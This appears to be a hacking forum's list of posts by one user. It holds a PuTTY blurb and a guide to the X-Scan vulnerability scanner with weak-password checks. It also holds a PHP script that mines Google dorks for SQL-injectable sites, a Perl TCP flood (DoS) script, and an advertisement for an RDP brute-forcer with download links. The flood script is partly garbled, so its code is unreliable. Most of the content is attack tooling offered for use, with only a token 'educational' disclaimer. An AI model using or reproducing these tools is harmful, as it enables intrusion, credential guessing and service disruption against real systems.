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perl udp.pl

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Posts posted by perl udp.pl

  1. PuTTY is a free implementation of Telnet and SSH for Win32 and Unix platforms, along with an xterm terminal emulator. It is written and maintained primarily by Simon Tatham.

    The latest version is beta 0.60.

    SSH (Secure Shell) is the now ubiquitous program for logging into or executing commands on a remote machine. It provides secure encrypted communications between two untrusted hosts over an insecure network, replacing the hideously insecure telnet/rlogin/rsh alternatives. Most UNIX users run the open source OpenSSH server and client. Windows users often prefer the free PuTTY client, which is also available for many mobile devices. Other Windows users prefer the nice terminal-based port of OpenSSH that comes with Cygwin.

    Download: http://www.chiark.gr...sgtatham/putty/

  2. X-Scan v3.3

    X-Scan is a basic network vulnerability scanner utilising a multi-threading scan approach. The scanner can be utilised both at the command line and has an easy to use GUI front-end. The following items can be scanned:

    * Remote OS type and version detection,

    * Standard port status and banner information,

    * SNMP information,

    * CGI vulnerability detection,

    * IIS vulnerability detection,

    * RPC vulnerability detection,

    * SSL vulnerability detection,

    * SQL-server,

    * FTP-server,

    * SMTP-server,

    * POP3-server,

    * NT-server weak user/password pairs authentication module,

    * NT server NETBIOS information,

    * Remote Register information, etc.

    The results of the scan are saved in /log directory, and are title index_ip_address.htm (if you used the GUI) or ip_address if you used the command line option. These can be directly browsed by any normal Web Browser.

    Basic user and password lists are supplied to carry out a basic attack on certain services, (above), if found enabled on the host.

    Problems: I have found that the basic port list in port.ini is less than accurate. It does not quote a number of very well-known ports i.e. 1521 for Oracle listener, 5000-5002 for Sybase etc. so this may need amending manually to give better results. The config.bak file needs to be amended if using the default as only 160 ports are checked. The report format is also very basic.

    Command-line usage:

    xscan -host <startIP>[-<endIP>] <module> [option]

    xscan -file <host_list_file> <module> [option]



    -tracert : trace route

    -port : check the status of standard service port

    -snmp : check SNMP information

    -ssl : check SSL vulnerability

    -rpc : check RPC vulnerability

    -sql : check SQL-Server weak password

    -ftp : check FTP-Server weak password

    -ntpass : check NT-Server weak password

    -netbios : check Netbios information

    -smtp : check SMTP-Server vulnerability

    -pop3 : check POP3-Server weak password

    -cgi : check HTTP vulnerability

    -iis : check IIS vulnerability

    -bind : check BIND service vulnerability

    -finger : check Finger service vulnerability

    -sygate : check Sygate vulnerability

    -all : check all vulnerability


    -v: display verbose information

    -p: skip host when failed to ping

    -o: skip host when no opened port be found

    -t <thread_count[,host_count]>: specify max thread/host count, default is 100,10


    xscan -host -all

    xscan -host -port -ntpass -p -t 100

    xscan -file host.lst -port -cgi -t 100,5 -v -o

    Example output (Fully patched Windows XP SP2 Host no servers running):

    C:\Documents and Settings\user\Desktop\xscan>XSCAN -host -all

    X-Scan v2.3 - command line security scanner

    http://www.xfocus.org, ??::?????©??

    Loading plug-in ....

    Load plug-in succeed.

    Checking "" ...

    []: Checking "Trace-Route" ...

    []: Found "Trace-Route".

    []: Checking "Port-Status" ...

    []: Port 25 is opened: SMTP, Simple Mail Transfer Protocol

    []: Port 80 is opened: HTTP, World Wide Web

    []: Port 81 is opened: HOSTS2 Name Server

    []: Port 82 is opened: XFER Utility

    []: Port 110 is opened: Pop3, Post Office Protocol - Version 3

    []: Port 83 is opened: MIT ML Device

    []: Port 119 is opened: Network News Transfer Protocol

    []: Port 1028 is opened: [unknown service]

    []: Port 1029 is opened: [unknown service]

    []: Port 1035 is opened: [unknown service]

    []: Port 1080 is opened: SOCKS

    []: Port 1863 is opened: [unknown service]

    []: Port 1026 is opened: [unknown service]

    []: Port 1025 is opened: network blackjack

    []: Port 1241 is opened: [unknown service]

    []: Port 5190 is opened: aol, America-Online

    []: Port 8080 is opened: Proxy server

    []: Port 8088 is opened: [unknown service]

    []: Port 11523 is opened: [unknown service]

    []: "Port-Status" scan complete, Found 19.

    []: Checking "Snmp-Info" ...

    []: "Snmp-Info" scan complete.

    []: Checking "SSL-Vuln" ...

    []: Failed to connect to host ""

    []: "SSL-Vuln" scan complete.

    []: Checking "RPC-Vuln" ...

    []: Failed to connect to host ""

    []: "RPC-Vuln" scan complete.

    []: Checking "SQL-Server-Password" ...

    []: Failed to connect to host ""

    []: "SQL-Server-Password" scan complete.

    []: Checking "FTP-Password" ...

    []: Failed to connect to host ""

    []: "FTP-Password" scan complete.

    []: Checking "NT-Server-Password" ...

    []: "NT-Server-Password" scan complete.

    []: Checking "NetBios-Info" ...

    []: Netbios "RemoteRegistryInfo" completed

    []: NullSession establish fails

    []: "NetBios-Info" scan complete.

    []: Checking "SMTP-Vuln" ...

    []: Failed to connect to host ""

    []: "SMTP-Vuln" scan complete.

    []: Checking "POP3-Password" ...

    []: "POP3-Password" scan complete.

    []: Checking "HTTP-Vuln" ...

    []: Checking "HTTP custom-built error pages" ...

    []: Checking "HTTP-Vuln" ...

    []: "HTTP-Vuln" scan complete.

    []: Checking "IIS-Vuln" ...

    []: Not MS-IIS server, skip

    []: "IIS-Vuln" scan complete.

    []: Checking "BIND-Vuln" ...

    []: "BIND-Vuln" scan complete.

    []: Checking "Finger-Vuln" ...

    []: "Finger-Vuln" scan complete.

    []: Checking "Sygate-Vuln" ...

    []: "Sygate-Vuln" scan complete.

    []: Complete.

    All vulnerability scan complete.

    The GUI version is basically point and click with the majority of modules enabled except for BIND, Finger, Sygate and Traceroute. In addition, by default once the SNMP string is found Xscan will not try to gain SNMP information. All these options need to be set in the Config section.

    Download: http://www.xfocus.or...can-v3.3-en.rar

  3. <?php


    ini_set('default_socket_timeout', 10);


    function getLinksG($dork){

    $engine = 'http://google.pl';

    $code = file_get_contents("$engine/search?as_q=" . urlencode($dork) . "&num=100");

    for($i = 1; $i < 20; $i++)

    $code .= file_get_contents("$engine/search?as_q=" . urlencode($dork) . "&num=100&start=".$i."00&filter=0");

    preg_match_all('/<a href="([^ ]+)" class=l/ei', $code, $links);


    $url = array();

    foreach($links[1] as $l => $u){

    if(!in_array($u, $url))

    array_push($url, $u);


    return $url;


    function checkBug($link){

    $code = file_get_contents("$link");

    if(stristr($code, 'mysql') || stristr($code, 'sql syntax'))

    return $link;

    return false;


    function link2sql($link){

    $url = parse_url($link);


    $query = preg_replace('/\=([0-9]+)/', "=\\1'", $url['query']);

    return checkBug("http://{$url['host']}{$url['path']}?$query");


    return false;


    echo "<pre>";

    $li = getLinksG($_GET['d']);

    foreach( $li as $k => $l){

    $b = link2sql($l);

    if($b != false) echo "$b\n";




  4. #!/usr/bin/perl use IO::Socket;print q

    {__________ ____ _____ |____ ____|/

    ___||_ | | | / / | __| | |

    ( \___ | | |__| \_____||__| _________

    __ _ \_ _____/| | ____ ____ __| | | __)

    | | / _ \ / _ \ / __ | | | | |_( | ) /_/ |

    \___| |____/\____/ \____/\_____|

    with data sending.

    Made By ZeN DU Security Group Coderz };

    print "Host : "; $serv = ; chop ($serv); print "Port : "; $port = ; chop ($port);

    print "Data :"; $data = ; chop($data); print "Times To Flood : "; $times = ; chop ($times);

    for ($i=0; $inew( Proto => "tcp", PeerAddr => "$serv", PeerPort => "$port") || print "[*] Server Down!\n"; print $flood $data; syswrite STDOUT, "[*] Flooding - ".$i."\n"; } print "[*] End of flood.\n";

    Here is a very basic perl script for sending data to a server over and over again. Here is a basic usuage example >

    Host : www.site.com Post : 80 Data : GET / Times to Flood : 9999999

    The script will send the data to specified host over and over again in a loop until it reaches the value of the $times variable, which is set when by you at prompt 'Times to Flood'. Scripts such as these are used everyday in DoS & DDoS attacks (Denial of Service), on its own this script will have little to no impact on any half decent server. I made this script, along with a selection of others as a part of a project im working on currently Wink. While I do not condone attacks of this type, feel free to edit/use this example in however way you wish. THIS IS FOR EDUCATIONAL PURPOSES ONLY!!!

  5. RDP Brutus, based on all known tss Brutus.

    * Select the type of scan IP: one specified range, either immediately on the list of ranges.

    * Option flows for the scanner, the ability to change the port for the scan

    * Settings flows for Brutus (how IP will be checked on a separate thread)

    * Ability to scan without Brutus

    * Brutus, a list of usernames to the list of passwords

    * Work anywhere on the disk (including the Russian way)

    * Avtosvorachivanie windows Brutus

    * Edit the list of usernames and passwords directly from the program

    * Output sbruchennyh grandparents in a separate window by pressing the button at any time (even in the Brut)

    * Sending Hoods at your number ICQ (master Ween - Ie only the number that you want to send - you can specify in the preferences)


    File-Upload.net - h4cky0u.txt


    Download RDP Brute v.0.6.rar from Sendspace.com - send big files the easy way

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